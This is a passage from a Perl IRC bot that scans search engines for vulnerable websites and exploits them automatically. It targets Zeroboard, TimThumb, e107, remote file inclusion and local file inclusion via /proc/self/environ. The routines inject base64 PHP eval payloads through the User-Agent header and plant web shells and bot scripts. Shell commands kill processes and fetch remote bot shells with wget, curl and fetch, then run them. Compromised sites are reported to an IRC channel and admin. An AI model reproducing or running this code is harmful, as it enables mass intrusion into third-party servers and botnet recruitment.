1203. if ($pid = fork) { waitpid($pid, 0); }
1204. else { if (fork) { exit; } else {
1205. &type($chan,$bug,$dork,"NaVeR",$type);
1206. } exit; }
1207. }
1208.  
1209. if ($engine =~ /doogate/i) {
1210. if (my $pid = fork) { waitpid($pid, 0); }
1211. else { if (fork) { exit; } else {
1212. &type($chan,$bug,$dork,"DooGatE");
1213. } exit; }
1214. }
1215.  
1216. if ($engine =~ /sogou/i) {
1217. if ($pid = fork) { waitpid($pid, 0); }
1218. else { if (fork) { exit; } else {
1219. &type($chan,$bug,$dork,"SoGoU",$type);
1220. } exit; }
1221. }
1222.  
1223. if ($engine =~ /interia/i) {
1224. if ($pid = fork) { waitpid($pid, 0); }
1225. else { if (fork) { exit; } else {
1226. &type($chan,$bug,$dork,"InTeRiA",$type);
1227. } exit; }
1228. }
1229.  
1230. if ($engine =~ /snz/i) {
1231. if ($pid = fork) { waitpid($pid, 0); }
1232. else { if (fork) { exit; } else {
1233. &type($chan,$bug,$dork,"SnZ",$type);
1234. } exit; }
1235. }
1236.  
1237. if ($engine =~ /yandex/i) {
1238. if ($pid = fork) { waitpid($pid, 0); }
1239. else { if (fork) { exit; } else {
1240. &type($chan,$bug,$dork,"YaNdEx",$type);
1241. } exit; }
1242. }
1243.  
1244. if ($engine =~ /joeant/i) {
1245. if ($pid = fork) { waitpid($pid, 0); }
1246. else { if (fork) { exit; } else {
1247. &type($chan,$bug,$dork,"JoEaNt",$type);
1248. } exit; }
1249. }
1250.  
1251. if ($engine =~ /terra/i) {
1252. if ($pid = fork) { waitpid($pid, 0); }
1253. else { if (fork) { exit; } else {
1254. &type($chan,$bug,$dork,"TeRrA",$type);
1255. } exit; }
1256. }
1257. if ($engine =~ /youdao/i) {
1258. if ($pid = fork) { waitpid($pid, 0); }
1259. else { if (fork) { exit; } else {
1260. &type($chan,$bug,$dork,"YoUdAo",$type);
1261. } exit; }
1262. }
1263.  
1264. if ($engine =~ /amfibi/i) {
1265. if ($pid = fork) { waitpid($pid, 0); }
1266. else { if (fork) { exit; } else {
1267. &type($chan,$bug,$dork,"AmFiBi",$type);
1268. } exit; }
1269. }
1270.  
1271. if ($engine =~ /bigclique/i) {
1272. if ($pid = fork) { waitpid($pid, 0); }
1273. else { if (fork) { exit; } else {
1274. &type($chan,$bug,$dork,"BiGcLiQuE",$type);
1275. } exit; }
1276. }
1277.  
1278. if ($engine =~ /dancefloor/i) {
1279. if ($pid = fork) { waitpid($pid, 0); }
1280. else { if (fork) { exit; } else {
1281. &type($chan,$bug,$dork,"DaNcEfLoOr",$type);
1282. } exit; }
1283. }
1284.  
1285. if ($engine =~ /live/i) {
1286. if ($pid = fork) { waitpid($pid, 0); }
1287. else { if (fork) { exit; } else {
1288. &type($chan,$bug,$dork,"LiVe",$type);
1289. } exit; }
1290. }
1291.  
1292. if ($engine =~ /rakuten/i) {
1293. if ($pid = fork) { waitpid($pid, 0); }
1294. else { if (fork) { exit; } else {
1295. &type($chan,$bug,$dork,"RaKuTeN",$type);
1296. } exit; }
1297. }
1298.  
1299. if ($engine =~ /biglobe/i) {
1300. if ($pid = fork) { waitpid($pid, 0); }
1301. else { if (fork) { exit; } else {
1302. &type($chan,$bug,$dork,"BiGlObE",$type);
1303. } exit; }
1304. }
1305.  
1306. if ($engine =~ /nova/i) {
1307. if ($pid = fork) { waitpid($pid, 0); }
1308. else { if (fork) { exit; } else {
1309. &type($chan,$bug,$dork,"NoVa",$type);
1310. } exit; }
1311. }
1312.  
1313. if ($engine =~ /najdi/i) {
1314. if ($pid = fork) { waitpid($pid, 0); }
1315. else { if (fork) { exit; } else {
1316. &type($chan,$bug,$dork,"NaJdI",$type);
1317. } exit; }
1318. }
1319.  
1320. if ($engine =~ /goo/i) {
1321. if ($pid = fork) { waitpid($pid, 0); }
1322. else { if (fork) { exit; } else {
1323. &type($chan,$bug,$dork,"GoO",$type);
1324. } exit; }
1325. }
1326.  
1327. if ($engine =~ /uksubmit/i) {
1328. if ($pid = fork) { waitpid($pid, 0); }
1329. else { if (fork) { exit; } else {
1330. &type($chan,$bug,$dork,"UkSuBmIt",$type);
1331. } exit; }
1332. }
1333.  
1334. if ($engine =~ /excite/i) {
1335. if ($pid = fork) { waitpid($pid, 0); }
1336. else { if (fork) { exit; } else {
1337. &type($chan,$bug,$dork,"ExCiTe",$type);
1338. } exit; }
1339. }
1340.  
1341. if ($engine =~ /mamma/i) {
1342. if ($pid = fork) { waitpid($pid, 0); }
1343. else { if (fork) { exit; } else {
1344. &type($chan,$bug,$dork,"MaMMa",$type);
1345. } exit; }
1346. }
1347. }
1348.  
1349. ######################################### ADDED
1350.  
1351.  
1352. sub zboard() {
1353. my $chan = $_[0];
1354. my $bug = $_[1];
1355. my $dork = $_[2];
1356. my $engine = $_[3];
1357. my $count = 0;
1358. my @list = &search_engine($chan,$bug,$dork,$engine,$zerologo);
1359. my $num = scalar(@list);
1360. if ($num > 0) {
1361. foreach my $site (@list) {
1362. $count++;
1363. if ($count == $num-1) { &msg("$chan","$zerologo(4@3$engine15)10 Scan finish"); }
1364. my $coba = "http://".$site.$bug."?id=byroe";
1365. my $cek = &get_content($coba);
1366. if ($cek =~ /Zeroboard/) {
1367. my $cok = system("./zero $coba 80");sleep(2);
1368. my $check2 = &get_content("http://".$site."/data/shell.php");
1369. if ($check2 =~ /Cannot execute a blank command/) {
1370. my $os = "";
1371. my $safe = "";
1372. my $uid = "";
1373. my $vuln = &get_content("http://".$site.$action);
1374. my $vuln1 = "http://".$site."/data/stun.php";
1375. my $yuhu = &get_content($vuln2);sleep(1);
1376. my $check = &get_content($vuln1);
1377. if ($check =~ /Rei Area/i) {
1378. if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
1379. if ($check =~ m/safe_mode: <b><font color=(.*?)>(.*?)<\/font><\/b>/) {$safe = $2;}
1380. if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
1381. &msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln1." 3 (OS=$os) (Safe Mode =$safe) ");
1382. &msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln1." 3 (OS=$os) (Safe Mode =$safe) ");
1383. }
1384. }
1385. }
1386. }
1387. }
1388. }
1389.  
1390. #########################################
1391.  
1392. sub thumb() {
1393. my $chan = $_[0];
1394. my $bug = $_[1];
1395. my $dork = $_[2];
1396. my $engine = $_[3];
1397. my $count = 0;
1398. my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
1399. my $num = scalar(@list);
1400. if ($num > 0) {
1401. foreach my $site (@list) {
1402. $count++;
1403. if ($count == $num-1) { &msg("$chan","$thumblogo(4@3$engine15)10 Scan finish"); }
1404. my $vuln = "http://".$site.$bug."?src=".$thumbshell;
1405. my $cek = &get_content($vuln);sleep(1);
1406. if ($cek =~ /Unable to open image/i) {
1407. &msg("$chan","$thumblogo(4@3$engine15)8 e3x7p5l6o2i11t4i0n12g13 $site");sleep(1);
1408. (my $bery = $bug)=~ s{/[^/]+\z}{};
1409. my $vuln2 = "http://".$site.$bery.$folder1;
1410. my $vuln3 = "http://".$site.$bery.$folder2;
1411. my $vuln4 = "http://".$site.$bery.$folder3;
1412. my $vuln5 = "http://".$site.$bery.$folder4;
1413. my $vuln6 = "http://".$site.$folder5;
1414. my $vuln7 = "http://".$site.$bery.$folderx1;
1415. my $vuln8 = "http://".$site.$bery.$folderx2;
1416. my $vuln9 = "http://".$site.$bery.$folderx3;
1417. my $vuln10 = "http://".$site.$bery.$folderx4;
1418. my $vuln11 = "http://".$site.$folderx5;
1419. my $os = "";
1420. my $safe = "";
1421. my $uid = "";
1422. my $check1 = &get_content($vuln2);sleep(1);&get_content($vuln7);sleep(1);
1423. my $check2 = &get_content($vuln3);sleep(1);&get_content($vuln8);sleep(1);
1424. my $check3 = &get_content($vuln4);sleep(1);&get_content($vuln9);sleep(1);
1425. my $check4 = &get_content($vuln5);sleep(1);&get_content($vuln10);sleep(1);
1426. my $check5 = &get_content($vuln6);sleep(1);&get_content($vuln11);sleep(1);
1427. if ($check1 =~ /uname -a/i) {
1428. if ($check1 =~ m/color=#cccccc><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
1429. if ($check1 =~ m/safe_mode: <b><font color=(.*?)>(.*?)<\/font><\/b>/) {$safe = $2;}
1430. if ($check1 =~ m/uid=(.*?)gid=/) {$uid = $1;}
1431. &msg("$chan","$thumblogo(4@3$engine15)15(4@3shell15)13 ".$vuln2." 3 (OS=$os) (Safe Mode = $safe) ");
1432. &msg("$admin","$thumblogo(4@3$engine15)15(4@3shell15)13 ".$vuln2." 3 (OS=$os) (Safe Mode =$safe) ");
1433. }
1434. if ($check2 =~ /uname -a/i) {
1435. if ($check2 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
1436. if ($check2 =~ m/safe_mode: <b><font color=(.*?)>(.*?)<\/font><\/b>/) {$safe = $2;}
1437. if ($check2 =~ m/uid=(.*?)gid=/) {$uid = $1;}
1438. &msg("$chan","$thumblogo(4@3$engine15)15(4@3shell15)13 ".$vuln3." 3 (OS=$os) (Safe Mode =$safe) ");
1439. &msg("$admin","$thumblogo(4@3$engine15)15(4@3shell15)13 ".$vuln3." 3 (OS=$os) (Safe Mode =$safe) ");
1440. }
1441. if ($check3 =~ /uname -a/i) {
1442. if ($check3 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
1443. if ($check3 =~ m/safe_mode: <b><font color=(.*?)>(.*?)<\/font><\/b>/) {$safe = $2;}
1444. if ($check3 =~ m/uid=(.*?)gid=/) {$uid = $1;}
1445. &msg("$chan","$thumblogo(4@3$engine15)15(4@3shell15)13 ".$vuln4." 3 (OS=$os) (Safe Mode =$safe) ");
1446. &msg("$admin","$thumblogo(4@3$engine15)15(4@3shell15)13 ".$vuln4." 3 (OS=$os) (Safe Mode =$safe) ");
1447. }
1448. if ($check4 =~ /uname -a/i) {
1449. if ($check4 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
1450. if ($check4 =~ m/safe_mode: <b><font color=(.*?)>(.*?)<\/font><\/b>/) {$safe = $2;}
1451. if ($check4 =~ m/uid=(.*?)gid=/) {$uid = $1;}
1452. &msg("$chan","$thumblogo(4@3$engine15)15(4@3shell15)13 ".$vuln5." 3 (OS=$os) (Safe Mode =$safe) ");
1453. &msg("$admin","$thumblogo(4@3$engine15)15(4@3shell15)13 ".$vuln5." 3 (OS=$os) (Safe Mode =$safe) ");
1454. }
1455. if ($check5 =~ /uname -a/i) {
1456. if ($check5 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
1457. if ($check5 =~ m/safe_mode: <b><font color=(.*?)>(.*?)<\/font><\/b>/) {$safe = $2;}
1458. if ($check5 =~ m/uid=(.*?)gid=/) {$uid = $1;}
1459. &msg("$chan","$thumblogo(4@3$engine15)15(4@3shell15)13 ".$vuln6." 3 (OS=$os) (Safe Mode =$safe) ");
1460. &msg("$admin","$thumblogo(4@3$engine15)15(4@3shell15)13 ".$vuln6." 3 (OS=$os) (Safe Mode =$safe) ");
1461. }
1462. }
1463. }
1464. }
1465. }
1466.  
1467.  
1468. sub rfi() {
1469. my $chan = $_[0];
1470. my $bug = $_[1];
1471. my $dork = $_[2];
1472. my $engine = $_[3];
1473. my $count = 0;
1474. my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
1475. my $num = scalar(@list);
1476. if ($num > 0) {
1477. foreach my $site (@list) {
1478. $count++;
1479. if ($count == $num-1) { &msg("$chan","$rfilogo(4@12$engine11,1)10 Scan finish"); }
1480. my $coba = "http://".$site.$bug."test??";
1481. my $test = "http://".$site.$bug.$injector."??";
1482. my $dor = "http://".$site.$bug.$botshell."??";
1483. my $dor2 = "http://".$site.$bug.$botshell2."??";
1484. my $dor3 = "http://".$site.$bug.$botshell3."??";
1485. my $cek = &get_content($coba);sleep(1);
1486. &get_content($dor);sleep(1);
1487. &get_content($dor2);sleep(1);
1488. &get_content($dor3);sleep(1);
1489. if ($cek =~ /failed to open stream/i) {
1490. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1491. &rfi_xpl($test,$chan,$site);
1492. exit;}
1493. }
1494. }
1495. }
1496. }
1497. }
1498.  
1499. sub rfi_xpl() {
1500. my $url = $_[0];
1501. my $chan = $_[1];
1502. my $site = $_[2];
1503. my $dor = $url.$botshell."??";
1504. my $dor2 = $url.$botshell2."??";
1505. my $dor3 = $url.$botshell3."??";
1506. my $test = $url.$injector."??";
1507. my $vuln = $url."14(botnetCrew)";
1508. my $check = &get_content($test);sleep(1);
1509. &get_content($dor);sleep(1);
1510. &get_content($dor2);sleep(1);
1511. &get_content($dor3);sleep(1);
1512. if ($check =~ /Rei Area/i ) {
1513. for my $t (@{$test}) {
1514. push @{ $found }, $t;
1515. }
1516. my $safe ="";
1517. my $os ="";
1518. if ($check =~ m/safe_mode: <b><font color=(.*?)>(.*?)<\/font><\/b>/) {$safe = $2;}
1519. if ($check =~ m/color=#cccccc><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
1520. &msg("$chan","$rfilogo(4@9Shell11,1)13 ".$test." 9(4@11,1SafeMode= $safe9)(4@11,1OS= $os9)");
1521. &msg("$admin","$rfilogo(4@9Shell11,1)13 ".$test." 9(4@11,1SafeMode= $safe9)(4@11,1OS= $os9)");
1522. }
1523. else {&msg("$chan","$rfilogo(4@9VuLn11,1)10 ".$vuln." (4@7UnVulnurlable11,1)");}
1524. }
1525.  
1526. sub lfi() {
1527. my $chan = $_[0];
1528. my $bug = $_[1];
1529. my $dork = $_[2];
1530. my $engine = $_[3];
1531. my $count = 0;
1532. my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
1533. my $num = scalar(@list);
1534. if ($num > 0) {
1535. foreach my $site (@list) {
1536. $count++;
1537. if ($count == $num-1) { &msg("$chan","$lfilogo(4@12$engine11,1)10 Scan finish"); }
1538. my $dir = "../../../../../../../../../../../../../";
1539. my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
1540. my $vuln = "http://".$site.$bug.$dir."/proc/self/environ%0000";
1541. my $shell = "http://".$site.$bug.$dir."/tmp/nxs%0000";
1542. my $html = &get_content($test);
1543. if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
1544. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1545. my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$injector.'","/tmp/nxs")) { echo "SUCCESS";@copy("'. $botshell.'","/tmp/bb");@copy("'.$botshell2.'","/tmp/asx"); }';
1546. my $res = lfi_env_query($test,encode_base64($code));
1547. &lfi_spread_query($test);
1548. &get_content("http://".$site.$bug.$dir."/tmp/bb%0000");
1549. &get_content("http://".$site.$bug.$dir."/tmp/asx%0000");
1550. $res =~ s/\n//g;
1551. if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
1552. for my $t (@{$res}) {
1553. push @{ $found }, $t;
1554. }
1555. my $sys = $1;
1556. $nob0dy = $2;
1557. &msg("$chan","$lfilogo(4@12$engine11,1)11,1(4@9SHeLL11,1)13 ".$shell." 11,1(4@9".$sys."11,1))11,1(4@9$nob0dy11,1)");sleep(2);
1558. }
1559. elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {
1560. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1561. my $sys = $1;
1562. $nob0dy = $2;
1563. my $upload = 'system("killall -9 perl;killall -9 php;wget '.$injector.' -O ipays.php;fetch '.$injector.';mv ipays.jpg ipays.php;wget '. $botshell.' -O byroe.php;fetch '.$botshell.';mv byroe.jpg byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv allnet.jpg allnet.php;");passthru ("killall -9 perl;killall -9 php;wget '.$injector.' -O ipays.php;fetch '.$injector.';mv ipays.jpg ipays.php;wget '.$botshell.' -O byroe.php;fetch '.$botshell.';mv byroe.jpg byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv allnet.jpg allnet.php;");';
1564. my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
1565. my $check = &get_content("http://".$site.$bug.$dir."/tmp/ipays%0000"); sleep(2);
1566. &get_content("http://".$site.$bug.$dir."/tmp/byroe%0000");sleep(2);
1567. &get_content("http://".$site.$bug.$dir."/tmp/allnet%0000");sleep(2);
1568. if ($check =~ /nxs 2009/i ) {
1569. for my $t (@{$shell}) {
1570. push @{ $found }, $t;
1571. }
1572. &msg("$chan","$lfilogo(4@12$engine11,1)11,1(4@9SHeLL11,1)13 ".$shell." 11,1(4@3".$sys."11,1)11,1(4@9$nob0dy11,1)");sleep(2);
1573. &msg("$admin","$lfilogo(4@12$engine11,1)11,1(4@9SHeLL11,1)13 ".$shell." 11,1(4@3".$sys."11,1)11,1(4@9$nob0dy11,1)");sleep(2);
1574. }
1575. else {
1576. &msg("$chan","$lfilogo(4@12$engine11,1)11,1(4@9SysTem11,1)7 ".$vuln." 11,1(4@3".$sys."11,1))11,1(4@9$nob0dy11,1)");sleep(2);
1577. }
1578. } exit; }
1579. }
1580. else { &msg("$chan","$lfilogo(4@12$engine11,1)11,1(4@9EnviRon11,1)10 ".$vuln); }
1581. } exit; } sleep(2);
1582. }
1583. }
1584. }
1585. }
1586.  
1587. sub lfi_env_query() {
1588. my $url = $_[0];
1589. my $code = $_[1];
1590. my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>");
1591. $ua->timeout(7);
1592. my $req = HTTP::Request->new(GET => $url);
1593. my $res = $ua->request($req);
1594. return $res->content;
1595. }
1596.  
1597. sub lfi_spread_query() {
1598. my $url = $_[0];
1599. my $code = "system('cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ". $botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;cd /var/tmp;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;rm -rf *.jp*;');";
1600. my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64($code)."'));?>");
1601. $ua->timeout(7);
1602. my $req = HTTP::Request->new(GET => $url);
1603. my $res = $ua->request($req);
1604. }
1605.  
1606. sub e107() {
1607. my $chan = $_[0];
1608. my $bug = $_[1];
1609. my $dork = $_[2];
1610. my $engine = $_[3];
1611. my $count = 0;
1612. my @list = &search_engine($chan,$bug,$dork,$engine,$e107logo);
1613. my $num = scalar(@list);
1614. if ($num > 0) {
1615. foreach my $site (@list) {
1616. $count++;
1617. if ($count == $num-1) { &msg("$chan","$e107logo(4@12$engine11,1)10 Scan finish"); }
1618. my $test = "http://".$site.$bug;
1619. my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdG lvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplb HNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVt KCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk 7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZi kpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
1620. my $html = &e107_rce_query($test,$code);
1621. if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {
1622. &e107xpl1($chan,$site,$engine);
1623. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1624. my $sys = $1;
1625. my $upload = 'if(@copy("'.$injector.'","system.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","bb.php");@copy("'.$botshell2.'","asx.php");} elseif(@copy("'.$injector.'","e107_themes/system.php")) { echo "nxs_dthem";@copy("'.$botshell.'","e107_themes/bb.php");@copy("'.$botshell2.'","e107_themes/asx.php");} elseif(@copy("'.$injector.'","e107_plugins/system.php")) { echo "nxs_dplug";@copy("'.$botshell.'","e107_plugins/bb.php");@copy("'. $botshell2.'","e107_plugins/asx.php");} elseif(@copy("'.$injector.'","e107_images/system.php")) { echo "nxs_dima";@copy("'.$botshell.'","e107_images/bb.php");@copy ("'.$botshell2.'","e107_images/asx.php");}';
1626. my $res = &e107_rce_query($test,encode_base64($upload));
1627. if ($res =~ /c0liSUKSESc0li/) {
1628. my $shell = "http://".$site."4system.php";
1629. for my $t (@{$shell}) {
1630. push @{ $found }, $t;
1631. }
1632. &get_content("http://".$site."bb.php");
1633. &get_content("http://".$site."asx.php");
1634. &get_content("http://".$site."logs.php");
1635. &get_content("http://".$site."botnet.php");
1636. &msg("$chan","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."4logs.php 11,1(4@3".$sys."11,1)(4@9safemode- off11,1)");sleep(2);
1637. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."4system.php 11,1(4@3".$sys."11,1)(4@9safemode- off11,1)");sleep(2);
1638. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."4botnet.php");sleep(2);
1639. }
1640. elsif ($res =~ /nxs_dthem/) {
1641. my $shell = "http://".$site."e107_themes/4system.php";
1642. for my $t (@{$shell}) {
1643. push @{ $found }, $t;
1644. }
1645. &get_content("http://".$site."e107_themes/bb.php");
1646. &get_content("http://".$site."e107_themes/asx.php");
1647. &get_content("http://".$site."e107_themes/logs.php");
1648. &get_content("http://".$site."e107_themes/botnet.php");
1649. &msg("$chan","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."e107_themes/4logs.php 11,1(4@3".$sys."11,1)(4@9safemode- off11,1)");sleep(2);
1650. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."e107_themes/4system.php 11,1(4@3".$sys."11,1) (4@9safemode-off11,1)");sleep(2);
1651. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."4botnet.php");sleep(2);
1652. }
1653. elsif ($res =~ /nxs_dplug/) {
1654. my $shell = "http://".$site."e107_plugins/4system.php";
1655. for my $t (@{$shell}) {
1656. push @{ $found }, $t;
1657. }
1658. &get_content("http://".$site."e107_plugins/bb.php");
1659. &get_content("http://".$site."e107_plugins/asx.php");
1660. &get_content("http://".$site."e107_plugins/logs.php");
1661. &get_content("http://".$site."e107_plugins/botnet.php");
1662. &msg("$chan","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."e107_plugins/4logs.php 11,1(4@3".$sys."11,1) (4@9safemode-off11,1)");sleep(2);
1663. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."e107_plugins/4system.php 11,1(4@3".$sys."11,1) (4@9safemode-off11,1)");sleep(2);
1664. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."4botnet.php");sleep(2);
1665. }
1666. elsif ($res =~ /nxs_dima/) {
1667. my $shell = "http://".$site."e107_images/4system.php";
1668. for my $t (@{$shell}) {
1669. push @{ $found }, $t;
1670. }
1671. &get_content("http://".$site."e107_images/bb.php");
1672. &get_content("http://".$site."e107_images/asx.php");
1673. &get_content("http://".$site."e107_images/logs.php");
1674. &get_content("http://".$site."e107_images/botnet.php");
1675. &msg("$chan","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."e107_images/4logs.php 11,1(4@3".$sys."11,1)(4@9safemode- off11,1)");sleep(2);
1676. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."e107_images/4system.php 11,1(4@3".$sys."11,1) (4@9safemode-off11,1)");sleep(2);
1677. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."4botnet.php");sleep(2);
1678. }
1679. else {
1680. &msg("$chan","$e107logo(4@12$engine11,1)11,1(4@9Vuln11,1)7 ".$test." 11,1(4@3".$sys."11,1)(4@9safemode-off11,1)");sleep(2);
1681. }
1682. &e107_spread_query($test);
1683. sleep(2);
1684. } exit; } sleep(2);
1685. }
1686. elsif ($html =~ /v0pCr3w<br>sys:(.+?)<br>/) {
1687. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1688. my $sys = $1;
1689. my $upload = 'if(@copy("'.$injector.'","system.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","bb.php");@copy("'. $botshell2.'","asx.php");@copy("'.$botshell3.'","logs.php");@copy("'.$cocok.'","botnet.php");} elseif(@copy("'.$injector.'","e107_themes/system.php")) { echo "nxs_dthem";@copy("'.$botshell.'","e107_themes/bb.php");@copy("'.$botshell2.'","e107_themes/asx.php");@copy("'.$botshell3.'","e107_themes/logs.php");@copy("'. $cocok.'","e107_themes/botnet.php");} elseif(@copy("'.$injector.'","e107_plugins/system.php")) { echo "nxs_dplug";@copy("'.$botshell.'","e107_plugins/bb.php");@copy ("'.$botshell2.'","e107_plugins/asx.php");@copy("'.$botshell3.'","e107_plugins/logs.php");@copy("'.$cocok.'","e107_plugins/botnet.php");} elseif(@copy("'. $injector.'","e107_images/system.php")) { echo "nxs_dima";@copy("'.$botshell.'","e107_images/bb.php");@copy("'.$botshell2.'","e107_images/asx.php");@copy("'. $botshell3.'","e107_images/logs.php");@copy("'.$cocok.'","e107_images/botnet.php");}';
1690. my $res = &e107_rce_query($test,encode_base64($upload));
1691. if ($res =~ /c0liSUKSESc0li/) {
1692. my $shell = "http://".$site."4system.php";
1693. for my $t (@{$shell}) {
1694. push @{ $found }, $t;
1695. }
1696. &e107xpl1($chan,$site,$engine);
1697. &get_content("http://".$site."bb.php");
1698. &get_content("http://".$site."asx.php");
1699. &get_content("http://".$site."logs.php");
1700. &get_content("http://".$site."botnet.php");
1701. &msg("$chan","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."4logs.php 11,1(4@3".$sys."11,1)(4@7safemode- on11,1)");sleep(2);
1702. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."4system.php 11,1(4@3". $sys."11,1)(4@7safemode-on11,1)");sleep(2);
1703. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."4botnet.php");sleep(2);
1704. }
1705. if ($res =~ /nxs_dthem/) {
1706. my $shell = "http://".$site."e107_themes/4system.php";
1707. for my $t (@{$shell}) {
1708. push @{ $found }, $t;
1709. }
1710. &get_content("http://".$site."e107_themes/bb.php");
1711. &get_content("http://".$site."e107_themes/asx.php");
1712. &get_content("http://".$site."e107_themes/logs.php");
1713. &get_content("http://".$site."e107_images/botnet.php");
1714. &msg("$chan","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."e107_themes/4logs.php 11,1(4@3".$sys."11,1)(4@7safemode- on11,1)");sleep(2);
1715. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9SheLL11,1)13 http://".$site."e107_themes/4system.php 11,1 (4@3".$sys."11,1)(4@7safemode-on11,1)");sleep(2);
1716. &msg("$admin","$e107logo(4@12$engine11,1)11,1(4@9BotNEt11,1)13 http://".$site."4botnet.php");sleep(2);
1717. }
1718. if ($res =~ /nxs_dplug/) {
1719. my $shell = "http://".$site."e107_plugins/4system.php";
1720. for my $t (@{$shell}) {
1721. push @{ $found }, $t;
1722. }
1723. &get_content("http://".$site."e107_plugins/bb.php");
